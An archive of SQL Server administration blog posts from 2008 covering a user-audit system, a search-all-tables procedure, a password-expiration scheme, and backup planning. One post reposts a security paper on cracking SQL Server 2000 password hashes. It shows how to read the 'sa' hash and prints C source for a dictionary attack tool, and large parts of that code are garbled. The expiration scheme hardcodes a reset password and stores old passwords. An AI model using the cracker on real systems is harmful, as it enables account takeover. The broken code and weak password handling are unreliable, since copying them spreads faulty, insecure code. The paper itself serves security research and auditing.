This stored procedure takes a ServerName as a parameter. If you use this option, it will call the procedure sp_GetDBRoles for just that ServerName. If you leave the ServerName blank, then it will call sp_GetAllDBRoles and process all enabled ServerNames from the config table. This proc will then get the user data into the staging table as described above. It will then call the sp_ProduceDatabaseRolesResults procedure, which will process the data in the staging table, comparing it to the historical data. Then the data in the history table will be pumped into the Archive table. The history table will be truncated. The current staging data will be pumped into the history table, and there await the next execution. This is the Gem of the sytem, taking all other parts into account, and doing it all for you. This can be called singly when the Auditor requests it. Or you can schedule it to run as a job, and simply query the resulting data in the DatabaseRolesDisplay table. There are many options you now have to follow, depending on your own needs. This system will allow you to gather user information, stage it, and store it historically. Allowing you the chance to see back into the past at a snapshot of what once was. No more will you be stymied by auditors or others with the questions of what users do we have in the system, and how do they compare to a year ago. You have the data, you are empowered, you are the DBA in control and informed. I hope that this system will help you gather the needed data and have it onhand to help out with your user reviews.

Tuesday, May 13, 2008

How to search all columns of all tables in a database for a keyword?

While browsing the SQL Server newsgroups, every once in a while, I see a request for a script that can search all the columns of all the tables in a given database for a specific keyword. I had no such script handy at that time, so we ended up searching manually. That's when I really felt the need for such a script and came up with this stored procedure "SearchAllTables". It accepts a search string as input parameter, goes and searches all char, varchar, nchar, nvarchar columns of all tables (only user created tables. System tables are excluded), owned by all users in the current database. Feel free to extend this procedure to search other datatypes. The output of this stored procedure contains two columns: -
1) The table name and column name in which the search string was found -
2) The actual content/value of the column (Only the first 3630 characters are displayed) Here's a word of caution, before you go ahead and run this procedure. Though this procedure is quite quick on smaller databases, it could take hours to complete, on a large database with too many character columns and a huge number of rows. So, if you are trying to run it on a large database, be prepared to wait (I did use the locking hint NOLOCK to reduce any locking). It is efficient to use Full-Text search feature for free text searching, but it doesn't make sense for this type of ad-hoc requirements. Create this procedure in the required database and here is how you run it:--To search all columns of all tables in Pubs database for the keyword "Computer" EXEC SearchAllTables 'Computer'GO Here is the complete stored procedure code:
CREATE PROC SearchAllTables
(
@SearchStr nvarchar(100)
)
AS
BEGIN
CREATE TABLE #Results (ColumnName nvarchar(370), ColumnValue nvarchar(3630))
SET NOCOUNT ON
DECLARE @TableName nvarchar(256), @ColumnName nvarchar(128), @SearchStr2 nvarchar(110)
SET @TableName = ''
SET @SearchStr2 = QUOTENAME('%' + @SearchStr + '%','''')
WHILE @TableName IS NOT NULL
BEGIN
SET @ColumnName = ''
SET @TableName =
(
SELECT MIN(QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME))
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE'
AND QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) > @TableName
AND OBJECTPROPERTY(
OBJECT_ID(
QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME)
), 'IsMSShipped'
) = 0
)
WHILE (@TableName IS NOT NULL) AND (@ColumnName IS NOT NULL)
BEGIN
SET @ColumnName =
(
SELECT MIN(QUOTENAME(COLUMN_NAME))
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_SCHEMA = PARSENAME(@TableName, 2)
AND TABLE_NAME = PARSENAME(@TableName, 1)
AND DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar')
AND QUOTENAME(COLUMN_NAME) > @ColumnName
)

IF @ColumnName IS NOT NULL
BEGIN
INSERT INTO #Results
EXEC
(
'SELECT ''' + @TableName + '.' + @ColumnName + ''', LEFT(' + @ColumnName + ', 3630)
FROM ' + @TableName + ' (NOLOCK) ' +
' WHERE ' + @ColumnName + ' LIKE ' + @SearchStr2
)
END
END
END
SELECT ColumnName, ColumnValue FROM #Results
END

Monday, May 12, 2008

One stop shop for SQL tools

A must have for any DB admin.
SQL Toolbelt™ from Redgate tools. ALL our SQL Server tools in a single installer
Eleven acclaimed tools that burn through tedious SQL chores
Completely intuitive, easy to use, they go to work for you straight away
Fast, accurate and relentlessly tested so you can save time
The SQL Toolbelt allows developers and DBAs to gain access to ALL the SQL Server tools we currently produce, including new releases. This means that when you are working with SQL Server databases, you can finally have the most powerful set of tools right there to hand, when you need them.
Whether you are a DBA or a developer, you benefit from using tools that help you work better. The SQL Toolbelt is the simplest and most effective way for you to access all the SQL Server tools that you need, to get your job done, the way you want to do it, and fast.
Products included in the SQL Toolbelt:

SQL Compare® Pro: compare and synchronize schemas
SQL Data Compare™ Pro: compare and synchronize data
SQL Packager™ Pro: package, upgrade, and install databases
SQL Prompt™ Pro: seamless IntelliSense-style code completion and layout
SQL Data Generator: automatically populate databases with realistic test data
SQL Dependency Tracker™: graphical impact analysis
SQL Refactor™: a host of smart refactorings on the fly
SQL Doc™ Pro: multiple database documentation
SQL Backup™ Pro**: compress and securely encrypt backups fast
SQL Multi Script™ Unlimited: execute multiple scripts against multiple SQL Servers with a single click
SQL Toolkit™: automate functionality with our APIs

With the SQL Toolbelt, you get it all in one go, once and for all, and you're set for the rest of the year.

Sunday, May 11, 2008

Implement password expiration dates for SQL Server 2000

Introduction

This article discusses a method that you can use to implement password expiration dates for Microsoft SQL Server logins. The method uses one user-created table, and three stored procedures. This method is just one variation that you can use, and you can modify the method to fit your own needs.If you have Microsoft SQL Server running in Integrated Security mode under Microsoft Windows 2000 or a later version, you can rely on Windows for the expiration of the password. Whenever possible, we recommend that you use the Integrated Security mode for connections to SQL Server. Windows authentication helps provide security enforcement mechanisms such as stronger authentication protocols, and mandatory password complexity and expiration.The method discussed in this article applies to an instance of SQL Server that is running in mixed security mode.
1.
Create a table in the master database that will hold the following:
•The user login ID.
•The date the password was last changed.
•The last password that was used


Note Only the system administrator (sa) should have access to this table

CREATE TABLE PW_DATE

(

SID VARBINARY(85),

DATE DATETIME,

OLD_PW SYSNAME NULL

)

2. Create a stored procedure that will determine whether the password has expired. If the password has expired, the procedure will then assign the login ID a new password, and the user must have the sa change it back. Additionally, you may also want to include other checks that you consider appropriate for your environment. The only two logins the procedure will not change the password for are the sa or the PROBE logins. The following example sets the password to expire after 30 days, and it lists all the users whose passwords have expired.

Note Only the sa should have EXECUTE permission.

CREATE PROCEDURE SP_PASSWORD_CHECK

(@secret nvarchar(128))

AS

DECLARE @sid varbinary(85)

DECLARE @date datetime

DECLARE @name nvarchar(128)

DECLARE crsPW

CURSOR FOR SELECT SID,[DATE] FROM PW_DATE WHERE DATEADD(DAY, 30, PW_DATE.DATE) <= GETDATE()

OPEN crsPW

FETCH NEXT FROM crsPW INTO @sid, @date WHILE (@@FETCH_STATUS=0)

BEGIN SELECT @name = [NAME] FROM syslogins WHERE sid = @sid AND syslogins.[name] NOT IN ('sa', 'probe') IF @@ROWCOUNT = 1 EXEC sp_password NULL, @secret, @name

FETCH NEXT FROM crsPW INTO @sid, @date

END

CLOSE crsPW

DEALLOCATE crsPW

3. Run the SP_PASSWORD_CHECK procedure nightly by using a Transact-SQL script that is similar to the following: USE MASTERGOEXEC SP_PASSWORD_CHECK 'gulliver'GO
To run the Transact-SQL script run nightly, add a Transact-SQL Script step to a New Job in SQL Server Agent, and then schedule the job to run nightly.


4. Instead of using the SP_ADDLOGIN and the SP_PASSWORD stored procedures, you will use two new stored procedures. The SP_CORP_ADDLOGIN stored procedure replaces the SP_ADDLOGIN stored procedure, and the SP_CORP_PASSWORD stored procedure replaces the SP_PASSWORD stored procedure.

To make sure that the old procedures are not used, revoke execute permissions for both the SP_ADDLOGIN stored procedure and for the SP_PASSWORD stored procedure.
Note You can modify the SP_ADDLOGIN and the SP_PASSWORD stored procedures. However, if you install an upgrade, make sure that you do not remove the SP_ADDLOGIN or the SP_PASSWORD stored procedures.
CREATE PROCEDURE SP_CORP_ADDLOGIN


@LOGIN_ID VARCHAR(30),

@PASSWD VARCHAR(30) = NULL,

@DEFDB VARCHAR(30) = NULL AS

EXEC SP_ADDLOGIN @LOGIN_ID, @PASSWD, @DEFDB

INSERT INTO PW_DATE (SID, DATE, OLD_PW)

VALUES

(SUSER_SID(@LOGIN_ID), GETDATE(), NULL)
GO



CREATE PROCEDURE SP_CORP_PASSWORD

@OLD VARCHAR(30) = NULL,

@NEW VARCHAR(30),

@LOGIN_ID VARCHAR(30) = NULL AS

EXEC SP_PASSWORD @OLD, @NEW, @LOGIN_ID IF (@LOGIN_ID = NULL) BEGIN

UPDATE PW_DATE SET DATE = GETDATE(), OLD_PW = @OLD WHERE SID = SUSER_SID ()

END

ELSE

BEGIN

UPDATE PW_DATE SET DATE = GETDATE(), OLD_PW = @OLD WHERE SID = SUSER_SID(@LOGIN_ID)

END
5. The final step is to initialize the system. If you have an active system with user login IDs, the sa should run the following query to load the PW_DATE table with the starting values:
INSERT INTO PW_DATE (SID, DATE, OLD_PW) SELECT SYSLOGINS.SID, GETDATE(), SYSLOGINS.PASSWORD FROM SYSLOGINS
Now, the system should be ready. You can vary this method to meet your own needs

Saturday, May 10, 2008

Cracking Microsoft SQL Server Passwords


How does SQL Server store passwords?
SQL Server uses an undocumented function, pwdencrypt() to produce a hash of the user's password, which is stored in the sysxlogins table of the master database. This is probably a fairly common known fact. What has not been published yet are the details of the pwdencrypt() function. This paper will discuss the function in detail and show some weaknesses in the way SQL Server stores the password hash. In fact, as we shall see, later on I should be saying,
'password hashes'.
What does an SQL password hash look like?
Using Query Analyzer, or the SQL tool of your choice, run the following query

select password from master.dbo.sysxlogins where name='sa'
You should get something that looks similar to the following returned.
0x01008D504D65431D6F8AA7AED333590D7DB1863CBFC98186BFAE06EB6B327EFA5449E6F649BA954AFF4057056D9B
This is the hash of the 'sa' login's password on my machine.
What can we derive from pwdencrypt() about the hash?
Time
The query
select pwdencrypt('foo')
produces
0x0100544115053E881CA272490C324ECE22BF17DAF2AB96B1DC9A7EAB644BD218969D09FFB97F5035CF7142521576
but several seconds later repeating the query
select pwdencrypt('foo')
produces
0x0100D741861463DFFF7B5282BF4E5925057249C61A696ACB92F532819DC22ED6BE374591FAAF6C38A2EADAA57FDF
The two hashes are different and yet the input, ‘foo’, is the same. From this we can deduce that time must play an important part in the way password hashes are created and stored. The design reasons behind this will be such that if two people use the same password then their hashes will be different - thus disguising the fact that their passwords are the same.

CASE

Run the query
select pwdencrypt('AAAAAA')
which produces
0x01008444930543174C59CC918D34B6A12C9CC9EF99C4769F819B43174C59CC918D34B6A12C9CC9EF99C4769F819B
Now, we can note that there are probably two password hashes here. If you can't spot itimmediately let me break it down
0x0100
84449305
43174C59CC918D34B6A12C9CC9EF99C4769F819B
43174C59CC918D34B6A12C9CC9EF99C4769F819B
As can be seen, the last 40 characters are the same as the penultimate 40 characters. This suggests that passwords are stores twice. One of them is the normal case sensitive password and the other is the upper-cased version of the password. This is not good as any one attempting to crack SQL passwords now has an easier job. Rather than having to break a case sensitive password they need only go after the upper-cased version. This reduces the number of
characters they need to attempt considerably.
From what we know already, that changes in time will produce a change in the hash, there must be something about time that makes the password hashes different and this information must be readily available so when someone attempts to login a comparison can be performed against the
hash derived from the password they supply and the hash stored in the database. In the breakdown of results from pwdencrypt() above the 84449305 portion is this piece of information.This number is derived in the following fashion. The time () C function is called and used as a seed passed to the srand() function. srand() sets a start point to be used for producing a series of (pseudo)random numbers. Once srand is seeded the rand() function is called to produce a pseudo random number. This number is an integer; however SQL server converts this to a short
and sets it aside. Lets call this number SN1. The rand() function is called again producing another pseudo random integer which, again, is converted into a short. Let's call this number SN2. SN1 and SN2 are joined to produce an integer. SN1 becoming the most significant part and SN2 the least significant part : SN1:SN2 to produce a salt. This salt is then used to obscure the password.
Hashing the password
The user's password is converted to it's UNICODE version if not already in this form. The salt is then appended to the end. This is then passed to the crypt functions in advapi32.dll to produce a hash using the secure hashing algorithm or SHA. The password is then converted to its upper case form, the salt tacked onto the end and another SHA hash is produced.
0x0100 Constant Header
84449305 Salt from two calls to rand()
43174C59CC918D34B6A12C9CC9EF99C4769F819B Case Sensitive SHA Hash
43174C59CC918D34B6A12C9CC9EF99C4769F819B Upper Case SHA Hash

The Authentication Process
When a user attempts to authenticate to SQL Server several things happen to do this. Firstly SQL Server examines the password entry for this user in the database and extracts the "salt" - 84449305 - in the example. This is then appended to the password the user supplies when attempting to log in and a SHA hash is produced. This hash is compared with the hash in the database and if they match the user is authenticated - and of course if the compare fails then the login attempt fails.
SQL Server Password Auditing
This is done in the same manner that SQL Server attempts to authenticate users. Of course, by far the best thing to do is, first off, is attempt to brute force the hash produced from the uppercased version. Once this has been guessed then it is trivial to workout the case sensitive password.
Source Code for a simple command line dictionary attack tool
/////////////////////////////////////////////////////////////////////////////////
//
// SQLCrackCl
//
// This will perform a dictionary attack against the
// upper-cased hash for a password. Once this
// has been discovered try all case variant to work
// out the case sensitive password.
//
// This code was written by David Litchfield of NGSSoftware Insight Security Research to
// demonstrate how Microsoft SQL Server 2000
// passwords can be attacked. This can be
// optimized considerably by not using the CryptoAPI.
//
// (Compile with VC++ and link with advapi32.lib
// Ensure the Platform SDK has been installed, too!)
//
//////////////////////////////////////////////////////////////////////////////////
#include
#include
#include
FILE *fd=NULL;
char *lerr = "\nLength Error!\n";
int wd=0;
int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);
int main(int argc, char *argv[])
{
int err = 0;
if(argc !=3)
{
printf("\n\n*** SQLCrack *** \n\n");
printf("C:\\>%s hash passwd-file\n\n",argv[0]);
printf("David Litchfield (david@ngssoftware.com)\n");
printf("24th June 2002\n");
return 0;
}
err = OpenPasswordFile(argv[2]);
if(err !=0)
{
return printf("\nThere was an error opening the password file %s\n",argv[2]);
}
err = CrackPassword(argv[1]);
fclose(fd);
printf("\n\n%d",wd);
return 0;
}
int OpenPasswordFile(char *pwdfile)
{
fd = fopen(pwdfile,"r");
if(fd)
return 0;
else
return 1;
}
int CrackPassword(char *hash)
{
char phash[100]="";
char pheader[8]="";
char pkey[12]="";
char pnorm[44]="";
char pucase[44]="";
char pucfirst[8]="";
char wttf[44]="";
char uwttf[100]="";
char *wp=NULL;
char *ptr=NULL;
int cnt = 0;
int count = 0;
unsigned int key=0;
unsigned int t=0;
unsigned int address = 0;
unsigned char cmp=0;
unsigned char x=0;
HCRYPTPROV hProv=0;
HCRYPTHASH hHash;
DWORD hl=100;
unsigned char szhash[100]="";
int len=0;
if(strlen(hash) !=94)
{
return printf("\nThe password hash is too short!\n");
}
if(hash[0]==0x30 && (hash[1]== 'x' hash[1] == 'X'))
{
hash = hash + 2;
strncpy(pheader,hash,4);
printf("\nHeader\t\t: %s",pheader);
if(strlen(pheader)!=4)
return printf("%s",lerr);
hash = hash + 4;
strncpy(pkey,hash,8);
printf("\nRand key\t: %s",pkey);
if(strlen(pkey)!=8)
return printf("%s",lerr);
hash = hash + 8;
strncpy(pnorm,hash,40);
printf("\nNormal\t\t: %s",pnorm);
if(strlen(pnorm)!=40)
return printf("%s",lerr);
hash = hash + 40;
strncpy(pucase,hash,40);
printf("\nUpper Case\t: %s",pucase);
if(strlen(pucase)!=40)
return printf("%s",lerr);
strncpy(pucfirst,pucase,2);
sscanf(pucfirst,"%x",&cmp);
}
else
{
return printf("The password hash has an invalid format!\n");
}
printf("\n\n Trying...\n");
if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0))
{
if(GetLastError()==NTE_BAD_KEYSET)
{
// KeySet does not exist. So create a new keyset
if(!CryptAcquireContext(&hProv,
NULL,
NULL,
PROV_RSA_FULL,
CRYPT_NEWKEYSET ))
{
printf("FAILLLLLLL!!!");
return FALSE;
}
}
}
while(1)
{
// get a word to try from the file
ZeroMemory(wttf,44);
if(!fgets(wttf,40,fd))
return printf("\nEnd of password file. Didn't find the password.\n");
wd++;
len = strlen(wttf);
wttf[len-1]=0x00;
ZeroMemory(uwttf,84);
// Convert the word to UNICODE
while(count < wp =" &uwttf;" cnt =" cnt" t =" key">> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << t =" t">> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << t =" t">> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << t =" t">> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
// Create the hash
if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))
{
printf("Error %x during CryptCreatHash!\n", GetLastError());
return 0;
}
if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
{
printf("Error %x during CryptHashData!\n", GetLastError());
return FALSE;
}
CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
// Test the first byte only. Much quicker.
if(szhash[0] == cmp)
{
// If first byte matches try the rest
ptr = pucase;
cnt = 1;
while(cnt < ptr =" ptr" cnt ="=" count =" 0;" cnt="0;">


NGSSoftware have created a GUI based SQL password cracker that does not use the CryptoAPI and is, consequently, much faster.

Note: The above write up has been taken from a document published by NGSSoftware and all credit should be given to them


Friday, May 9, 2008

SQL Server: Tuning Database Design

Partitioning Large Tables
Unless you follow some type of data archiving procedure in your OLTP applications, sooner or later your database tables become very large. Large is a relative term; as it applies to SQL Server tables, large means tables with ten millions or more rows. Retrieving data from such tables will take longer than you'd want. Building proper indexes can help performance greatly; we'll discuss indexing strategies in a separate article. If nothing else works, partition the large table horizontally based on the record date, demographics, or some other characteristic. For instance, if you have a patient table containing many millions of records, you might want to split it into several tables based on the hospital where each patient was treated. If you have millions of patients per hospital, you can further split tables based on the year when the patients were accepted into each hospital. Of course, doing so involves rewriting some queries and some DBA work for maintaining additional tables, but the performance benefits you gain will far outweigh the maintenance costs.
In addition to splitting large tables into several smaller tables, SQL Server 2000 supports the Distributed Partitioned Views (DPV), which is a way to spread the query-processing load over several servers. Note though that the DPV only work with the Enterprise and Developer Editions of SQL Server. Feel free to check out SQL Server Books On-Line for additional information about DPV.
Some of your queries can benefit from vertical partitioning as well. If most of your queries affect 5 out of 100 columns of your table, consider splitting the table into two tables with a one-to-one relationship. Having 100 columns in a single table is poor design for most business applications, but some applications have a business need to store a couple of hundred columns. If you're using the Enterprise Edition of SQL Server 2000, we recommend building an indexed view on such tables. You can create a view that contains the most frequently used columns, and build a unique clustered index on this view. The beauty of an indexed view is that SQL Server can take advantage of the index built on a view even if the query doesn't explicitly reference the view

SQL 2000: Backup to UNC name using Database Maintenance Wizard

HowTo: Backup to UNC name using Database Maintenance Wizard

SUMMARY
SQL Server 2000 Books On-Line states that the Database Maintenance Plan Wizard only supports backups to local disks. Backups can be done to a network resource under certain circumstances.

RESOLUTION
Backups to a network folder require the following prerequisites:
1) The SQL Server service must be running under a domain-level account.
2) The SQL Server service account must have FULL CONTROL rights to the file system folder and to the share.
3) The remote share should only be accessed via UNC name. Mapped drives may not be consistently visible to the SQL Service. Once these prerequisites are met, the UNC name can be typed into the 'Use this directory' text field on the 'Complete Backup' and/or the 'Transaction Log Backup' tabs of the Database Maintenance plan. SQL will then write backups to this location. Do not use the '…' button. This button will only enumerate local disk resources.

MORE INFORMATION
The most common failure cause is incorrect access permissions to the share or the underlying folder(s). Access to the share can be tested by logging into the console of the SQL Server as the SQL Service account. Test using the UNC share name only and not a mapped drive. Note that backing up to a network share can cause significant network traffic. Make sure your network can handle this load without adversely affecting other systems or end users. You may find it beneficial to establish a dedicated physical network connection between your database server and your backup file host

SQL Server 2000 Administrator's Pocket Consultant:Database Backup and Recovery

SQL Server 2000 Administrator's Pocket Consultant: Database Backup and Recovery.

Information is the fuel that drives the enterprise, and the most critical information is often stored in databases. Databases are where you'll find an organization's customer account information, partner directories, product knowledge base, and other important data. To protect an organization's data and to ensure the availability of its databases, you need a solid database backup and recovery plan.
Backing up databases can protect against accidental loss of data, database corruption, hardware failures, and even natural disasters. It's your job as a database administrator to perform backups and store them in a safe and secure location.


Creating a Backup and Recovery Plan
Creating and implementing a backup and recovery plan is one of your most important duties as a database administrator. Think of database backup as an insurance plan for the future—and for your job. Important data is accidentally deleted all the time. Mission-critical data can become corrupt. Natural disasters can leave your office in ruins. With a solid backup and recovery plan you can recover from any of these situations. Without one, you're left with nothing to fall back on.
Initial Backup and Recovery Planning
Creating and implementing a backup and recovery plan takes time. You'll need to figure out which databases need to be backed up, how often the databases should be backed up, and more. To help you create a plan, consider the following
:
  • What type of database are you backing up? System and user databases often have different backup and recovery needs. For example, the master database is essential for all Microsoft SQL Server operations. If the master database fails or becomes corrupt, it takes the whole server down with it. But you don't need to back up master every hour or every half hour—as you might have to do with a critical user database that handles real-time customer transactions. You need to back up master only after you create a database, change configuration values, configure SQL logons, or perform similar activities that make changes to the database.
  • How important is the data in the database? How you judge the data's importance can go a long way toward determining when and how you should back it up. While you may back up a development database weekly, you would probably back up a production database at least daily. The data's importance also drives your decision about the type of backup. With that development database, you'd probably do a full backup once a week. With an in-house customer order database that's updated throughout the weekday, you'd probably perform full backups twice a week and supplement this with daily differential backups and hourly backups for the transaction logs. You may even want to set named log marks that allow recovery up to a specific point of work.
  • How often are changes made to the database? The frequency of change can drive your decision about how often the database should be backed up. Because a read-only database doesn't ordinarily change, it doesn't need to be backed up regularly. On the other hand, a database that's updated nightly should be backed up after the nightly changes are posted. A database that's updated around the clock should be backed up continually.
  • How quickly do you need to recover the data? It's important to consider time when you create a backup plan. For mission-critical databases, you may need to get the database back online swiftly; to do this, you may need to alter your backup plan. Instead of backing up to tape, you may want to back up to disk drives or use multiple backup devices. Both options are much faster than restoring from a single tape device.
  • Do you have the equipment to perform backup? You need backup hardware to perform backups. If you don't have the hardware, you can't perform backups. To perform timely backups, you may need several backup devices and several sets of backup media. Backup hardware includes a tape drive, optical drives, removable disk drives, and plain old disk drives. Generally, tape drives are less expensive but slower than other types of drives.
  • What's the best time to schedule backups? You'll want to schedule backups when database usage is as low as possible. This will speed the backup process. However, in the real world you can't always schedule backups for off-peak hours. So you'll need to carefully plan when key databases are backed up.
  • Do you need to store backups off-site? Storing copies of backup tapes off-site is essential to the recovery of your systems in the case of a natural disaster. In your off-site storage location, you should also include copies of the software you may need to install in order to restore operations on a new system.
    Backing up a database is a bit different than backing up a server or a workstation. This is primarily because you'll often need to combine all (or nearly all) of the available techniques to ensure that you can recover a database completely. The basic types of backups you can perform include
  • Complete database backups Perform a full backup of the database, including all objects, system tables, and data. When the backup starts, SQL Server copies everything in the database and also includes any needed portions of the transaction log as the backup is in progress. Because of this, you can use a complete backup to recover the complete state of the data in the database at the time the backup operation finishes.
  • Differential backups Designed to back up data that has changed since the last complete backup. Because you store only the changes, the backup is faster and you can perform it more often. As with complete backups, differential backups include needed portions of the transaction logs, which allow you to restore the database to the time when the backup operation finishes.
  • Tip You can use differential backups only in conjunction with complete backups, and you can't perform differential backups on the master database. Don't confuse differential backups with incremental backups. Differential backups record all changes since the last full backup (which means the size of the incremental backup grows over time). Incremental backups record changes since the most recent full or incremental backup (which means the size of the incremental backup is usually much smaller than a full backup).
  • Transaction log backups Transaction logs are serial records of all database modifications and are used during recovery operations to commit completed transactions and to roll back uncompleted transactions. When you back up a transaction log, the backup stores the changes that have occurred since the last transaction log backup and then truncates the log, which clears out transactions that have been committed or aborted. Unlike complete and differential backups, transaction log backups record the state of the transaction log at the time the backup operation starts (not when it ends).
  • File and filegroup backups Allow you to back up database files and filegroups rather than the entire database. This is useful with large databases where, to save time, you want to back up individual files rather than the entire database. Many factors affect file and filegroup backups. When you use file and filegroup backups, you must back up the transaction log as well. Because of this dependency, you can't use this backup technique if Truncate Log On Checkpoint is enabled. Furthermore, if objects in the database span multiple files or filegroups, you must back up all the related files and filegroups at the same time.
    SQL Server 2000 uses recovery models to help you plan backups. The types of databases you are backing up and the types of backups you perform drive the choices for recovery models. The three recovery models shown on the following page are available:
  • Simple The simple recovery model is designed for databases that need to be recovered to the point of the last backup. The backup strategy with this model should consist of full and differential backups. You cannot perform transaction log backups when the simple recovery model is enabled. SQL Server 2000 turns on the Truncate Log On Checkpoint option, which clears out inactive entries in the transaction log on checkpoint. Because this model clears out transaction logs, it is ideal for most system databases.
  • Full The full recovery model is designed for databases that need to be recovered to the point of failure or to a specific point in time. With this model all operations are logged, including bulk operations and bulk loading of data. The backup strategy with this model should include full, differential, and transaction log backups, or full and transaction log backups only.
  • Bulk-logged The bulk-logged recovery model reduces the log space usage yet retains most of the flexibility of the full recovery model. With this model, bulk operations and bulk loads are minimally logged and cannot be controlled on a per operation basis. You'll need to manually redo bulk operations and bulk loads if the database fails before you perform a full or differential backup. The backup strategy with this model should include full, differential, and transaction log backups, or full and transaction log backups only.
    Each database can have a different recovery model. By default, master, msdb, and tempdb use the simple recovery model, and the model database uses the full recovery model. Model is the template database for all new databases, so if you change the default setting all new databases for the database server instance use the new default model. You set the recovery model by completing the following steps:
  • Start Enterprise Manager and then in the left pane (Console Root) click the plus sign (+) next to the server group you want to work with.
  • If plan to switch from bulk-logged recovery to simple recovery, perform a transaction log backup prior to making the change and then change your backup strategy so that you no longer perform transaction log backups.
  • Click the plus sign (+) next to the server you want to work with again and then click the plus sign (+) next to the Databases folder.
  • Right-click the database you want to work with and then, from the shortcut menu, choose Properties. This displays the database's Properties dialog box.
  • Use the Model selection list in the Options tab to change the recovery model and then click OK.
  • If you switched from simple recovery to full or bulk-logged recovery, add transaction log backups to your backup strategy for the database.
    Planning for Backups of Replicated Databases
    Databases that are replicated present a special problem for backup and restore. This is primarily because the traditional database architecture is extended to include three server roles:

    Publisher Servers that make data available for replication, track changes to data, and maintain other information about source databases.
  • Distributor Servers that distribute replicated data and store the distribution database.
  • Subscriber The destination servers for replication. They store the replicated data, receive updates, and in some cases can also make changes to data.
    Because of these roles, you'll need to use additional strategies for backing up and restoring replicated databases. For complete details see the section of the SQL Server Books Online entitled "Backing Up and Restoring Replication Databases." (Click Start, then Programs, then Microsoft SQL Server 2000, and then choose Books Online.)
    Planning for Backups of Very Large Databases
    When backing up and restoring very large databases, you may want to take advantage of parallel backup and restore. Parallel backup and restore allow SQL Server 2000 to use multiple threads to read and write data. This means SQL Server can read data from, and write data to, multiple data sources. Backup and restore use parallel input/output (I/O) in different ways:
  • Backup uses one thread per disk device to read data from the database when a database has files on several disk devices.
  • Restore uses one thread per disk device while it initializes a database that it's creating for the restore process, provided the database is defined with files on several disks.
  • Both backup and restore use one thread per backup device when a backup set is stored on multiple backup devices.
  • As you can see from the previous list, to take advantage of parallel I/O you must implement your backup strategy so that databases use
  • Multiple disk drives for storing data
  • Multiple backup devices for backing up and restoring data
  • Once you determine the backup operations you'll use on each database and how often you'll back up each database, you can select backup devices and media that meet these requirements. The next section covers backup devices and media.

    Selecting Backup Devices and Media
    Many different solutions are available for backing up data. Some are fast and expensive. Others are slow but very reliable. The backup solution that's right for your organization depends on many factors, including
  • Capacity The amount of data that you need to back up on a routine basis. Can the backup hardware support the required load given your time and resource constraints?
  • Reliability The reliability of the backup hardware and media. Can you afford to sacrifice reliability to meet budget or time needs?
  • Extensibility The extensibility of the backup solution. Will this solution meet your needs as your organization grows?
  • Speed The speed with which data can be backed up and recovered. Can you afford to sacrifice speed to reduce costs?
  • Cost The cost of the backup solution. Does the solution fit within your budget?
    Capacity, reliability, extensibility, speed, and cost are the issues that will influence your choice of a backup plan. If you determine the relative value of these issues to your organization, you'll be on the right track to selecting an appropriate backup solution. Some of the most commonly used backup solutions include
  • Tape drives Tape drives are the most common backup devices. They use magnetic tape cartridges to store data. Magnetic tapes are relatively inexpensive but aren't highly reliable. Tapes can break or stretch. They can also lose information over time. The average capacity of tape cartridges ranges from 100 MB to 2 GB. Compared with other backup solutions, tape drives are fairly slow. Still, the key selling point is the low cost of tape drives and magnetic tapes.
  • DAT drives DAT (digital audio tape) drives are quickly replacing standard tape drives as the preferred backup devices. DAT drives use 4-mm tapes and 8-mm tapes to store data. DAT drives and tapes are more expensive than standard tape drives and tapes, but they offer higher speed and more capacity. DAT drives that use 4-mm tapes typically can record over 30 MB per minute and have capacities of up to 16 GB. DAT drives that use 8-mm tapes typically can record more than 10 MB per minute and have capacities of up to 10 GB (with compression).
    Tip To perform faster backup and recovery operations, you can use multiple backup devices with SQL Server. For example, if it normally takes four hours to perform a full backup or restoration of the database, you can cut the backup and restoration time in half using two backup devices; with four backup devices you could fully back up or restore the database in an hour.
  • Autoloader tape systems Autoloader tape systems use a magazine of tapes that create extended backup volumes capable of meeting the high capacity needs of the enterprise. With an autoloader system, tapes within the magazine are automatically changed as needed during the backup or recovery process. Most autoloader tape systems use DAT tapes. The typical system uses magazines with between 4 and 12 tapes. The key drawback to these systems is the high cost.
  • Magnetic optical drives Magnetic optical drives combine magnetic tape technology with optical lasers to create a more reliable backup solution than DAT. Magnetic optical drives use 3.5-inch disks and 5.25-inch disks that look similar to floppies but are much thicker. Typically, magnetic optical disks have capacities of between 1 GB and 4 GB.
  • Tape jukeboxes Tape jukeboxes are similar to autoloader tape systems. Jukeboxes use magnetic optical disks rather than DAT tapes to offer high- capacity solutions for the enterprise. These systems load and unload disks stored internally for backup and recovery operations. The key drawback to tape jukeboxes is the high cost.
  • Removable disks Removable disks, such as Iomega Jaz, are increasingly being used as backup devices. Removable disks offer good speed and ease of use for a single drive or single system backup. However, the disk drives and the removable disks tend to be more expensive than standard tape or DAT drive solutions.
  • Disk drives Disk drives provide the fastest way to back up and restore databases. With disk drives, you can often accomplish in minutes what a tape drive takes hours to do. When your needs mandate a speedy recovery, nothing beats a disk drive. The drawbacks to disk drives, however, are high cost and low extensibility.
    Although backup device selection is an important step in implementing a backup and recovery plan, it isn't the only step. You also need to purchase the tapes or the disks, or both, that will allow you to implement your backup and recovery plan. The number of tapes, disks, or drives you need depends on

    How much data you'll be backing up
    How often you'll be backing up the data
    How long you'll need to keep additional data sets
  • The typical way to implement backups is to use a rotation schedule whereby you rotate through two or more sets of tapes, disks, or files. The idea is that you can increase media longevity by reducing media usage and at the same time reduce the number of actual tapes, disks, or files you need to ensure that you have data on hand when necessary.
